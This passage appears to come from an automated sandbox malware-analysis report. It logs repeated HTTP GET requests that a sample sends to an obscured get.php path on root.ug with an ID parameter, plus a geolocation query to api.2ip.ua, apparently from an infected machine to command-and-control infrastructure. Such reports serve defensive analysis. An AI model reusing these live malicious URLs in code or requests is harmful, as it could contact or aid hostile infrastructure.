Open Connection	protocol = http, server_name = root.ug, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /Asjdhfiughdhhjbdfh45687husdfhipenelop8/Asdhuage7386/get.php	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://root.ug/Asjdhfiughdhhjbdfh45687husdfhipenelop8/Asdhuage7386/get.php?pid=E3674298AE18BF5A335DF90DDA3F669F	1	Fn
Read Response	size = 1024, size_out = 257	1	Fn Data
Close Session	-	1	Fn

HTTP Session #3

Information	Value
User Agent	Microsoft Internet Explorer
Server Name	root.ug
Server Port	80
Username	-
Password	-
Data Sent	680 bytes
Data Received	1.66 KB

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = http, server_name = root.ug, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /Asjdhfiughdhhjbdfh45687husdfhipenelop8/Asdhuage7386/get.php	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://root.ug/Asjdhfiughdhhjbdfh45687husdfhipenelop8/Asdhuage7386/get.php?pid=E3674298AE18BF5A335DF90DDA3F669F	1	Fn
Read Response	size = 1024, size_out = 257	1	Fn Data
Close Session	-	1	Fn

HTTP Session #4

Information	Value
User Agent	Microsoft Internet Explorer
Server Name	root.ug
Server Port	80
Username	-
Password	-
Data Sent	680 bytes
Data Received	1.66 KB

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = http, server_name = root.ug, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /Asjdhfiughdhhjbdfh45687husdfhipenelop8/Asdhuage7386/get.php	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://root.ug/Asjdhfiughdhhjbdfh45687husdfhipenelop8/Asdhuage7386/get.php?pid=E3674298AE18BF5A335DF90DDA3F669F	1	Fn
Read Response	size = 1024, size_out = 257	1	Fn Data
Close Session	-	1	Fn

HTTP Session #5

Information	Value
Server Name	api.2ip.ua
Server Port	443
Username	-
Password	-
Data Sent	467 bytes
Data Received	7.19 KB

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = https, server_name = api.2ip.ua, server_port = 443	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json	1	Fn
Read Response	size = 10240, size_out = 465	1	Fn Data
Close Session	-	1	Fn

Remarks (2/2)

Monitored Processes

Behavior Information - Grouped by Category

Before

After